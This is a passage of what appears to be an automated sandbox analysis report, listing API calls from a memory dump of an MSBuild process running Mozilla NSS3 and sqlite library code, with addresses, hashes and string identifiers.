                                                                                        • free.MOZGLUE(?), ref: 6C6CF060
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2524771861-0
                                                                                        • Opcode ID: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
                                                                                        • Instruction ID: a267806c175d61604f28f5d78eb4579c51e664c7a25307fb2ccc407a7369f9bc
                                                                                        • Opcode Fuzzy Hash: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
                                                                                        • Instruction Fuzzy Hash: CF819FB1A00209ABDF00DFA4DC85ADE7BB5FF0D358F144024E919A3711EB35E925CBA6
                                                                                        APIs
                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C694D80
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C694D95
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C694DF2
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C694E2C
                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C694E43
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C694E58
                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C694E85
                                                                                        • DER_Encode_Util.NSS3(?,?,6C7E05A4,00000000), ref: 6C694EA7
                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C694F17
                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C694F45
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694F62
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694F7A
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C694F89
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694FC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Similarity
                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                        • String ID:
                                                                                        • API String ID: 2843999940-0
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6904B7
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C690539
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C69054A
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C69056D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6905CA
                                                                                        • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C6905EA
                                                                                        • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C6905FD
                                                                                        • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C690621
                                                                                        • PR_EnterMonitor.NSS3 ref: 6C69063E
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C690668
                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C690697
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906AC
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906CC
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6906DA
                                                                                          • Part of subcall function 6C68E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6C9
                                                                                          • Part of subcall function 6C68E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6D9
                                                                                          • Part of subcall function 6C68E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6F4
                                                                                          • Part of subcall function 6C68E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6904DC,?), ref: 6C68E703
                                                                                          • Part of subcall function 6C68E6B0: CERT_FindCertIssuer.NSS3(?,?,6C6904DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C68E71E
                                                                                          • Part of subcall function 6C68F660: PR_EnterMonitor.NSS3(6C69050F,?,00000001,?,?,?), ref: 6C68F6A8
                                                                                          • Part of subcall function 6C68F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F6C1
                                                                                          • Part of subcall function 6C68F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F7C8
                                                                                        Similarity
                                                                                        • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                        • String ID:
                                                                                        • API String ID: 2470852775-0
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C6BADE6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAE17
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE29
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAE3F
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6BAE78
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE8A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAEA0
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nyl
                                                                                        • API String ID: 332880674-862247975
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptInit), ref: 6C6BA676
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BA6A7
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA6B9
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA6CF
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6BA708
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA71A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA730
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptInit$nyl
                                                                                        • API String ID: 332880674-1173536456
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_InitPIN), ref: 6C6B2DF6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B2E24
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B2E33
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B2E49
                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2E68
                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2E81
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nyl
                                                                                        • API String ID: 1003633598-2977378113
                                                                                        APIs
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96
                                                                                          • Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
                                                                                          • Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
                                                                                          • Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
                                                                                          • Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA
                                                                                        Similarity
                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                        • API String ID: 4221828374-3736768024
                                                                                        APIs
                                                                                        • PR_SetErrorText.NSS3(00000000,00000000,?,6C6978F8), ref: 6C6D4E6D
                                                                                          • Part of subcall function 6C6709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6706A2,00000000,?), ref: 6C6709F8
                                                                                          • Part of subcall function 6C6709E0: malloc.MOZGLUE(0000001F), ref: 6C670A18
                                                                                          • Part of subcall function 6C6709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C670A33
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6978F8), ref: 6C6D4ED9
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C6C7703,?,00000000,00000000), ref: 6C6C5942
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6C7703), ref: 6C6C5954
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C596A
                                                                                          • Part of subcall function 6C6C5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C5984
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C6C5999
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C59BA
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6C59D3
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C59F5
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C6C5A0A
                                                                                          • Part of subcall function 6C6C5920: free.MOZGLUE(00000000), ref: 6C6C5A2E
                                                                                          • Part of subcall function 6C6C5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C6C5A43
                                                                                        • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4EB3
                                                                                          • Part of subcall function 6C6D4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6D4EB8,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D484C
                                                                                          • Part of subcall function 6C6D4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6D4EB8,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D486D
                                                                                          • Part of subcall function 6C6D4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6D4EB8,?), ref: 6C6D4884
                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4EC0
                                                                                          • Part of subcall function 6C6D4470: TlsGetValue.KERNEL32(00000000,?,6C697296,00000000), ref: 6C6D4487
                                                                                          • Part of subcall function 6C6D4470: EnterCriticalSection.KERNEL32(?,?,?,6C697296,00000000), ref: 6C6D44A0
                                                                                          • Part of subcall function 6C6D4470: PR_Unlock.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44BB
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F16
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F2E
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F40
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F6C
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F80
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D4F8F
                                                                                        • PK11_UpdateSlotAttribute.NSS3(?,6C7ADCB0,00000000), ref: 6C6D4FFE
                                                                                        • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C6D501F
                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6978F8), ref: 6C6D506B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 560490210-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 786543732-0
                                                                                        APIs
                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C754CAF
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754CFD
                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C754D44
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                        • API String ID: 2274617401-4033235608
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C6B2CEC
                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6B2D07
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2D22
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
                                                                                          • Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
                                                                                          • Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
                                                                                          • Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99
                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2D3B
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E
                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C6B2D54
                                                                                          • Part of subcall function 6C7909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C790BCB
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790BDE
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790C16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nyl
                                                                                        • API String ID: 420000887-2578169290
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6224BA
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62250D
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622554
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6225A7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622609
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62265F
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6226A2
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6226F5
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622764
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C622898
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6228D0
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C622948
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C62299B
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6229E2
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C622A31
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                        • String ID:
                                                                                        • API String ID: 2801635615-0
                                                                                        APIs
                                                                                        • sqlite3_initialize.NSS3 ref: 6C752D9F
                                                                                          • Part of subcall function 6C60CA30: EnterCriticalSection.KERNEL32(?,?,?,6C66F9C9,?,6C66F4DA,6C66F9C9,?,?,6C63369A), ref: 6C60CA7A
                                                                                          • Part of subcall function 6C60CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C60CB26
                                                                                        • sqlite3_exec.NSS3(?,?,6C752F70,?,?), ref: 6C752DF9
                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C752E2C
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E3A
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E52
                                                                                        • sqlite3_mprintf.NSS3(6C7BAAF9,?), ref: 6C752E62
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E70
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E89
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752EBB
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752ECB
                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C752F3E
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752F4C
                                                                                        Memory Dump Source
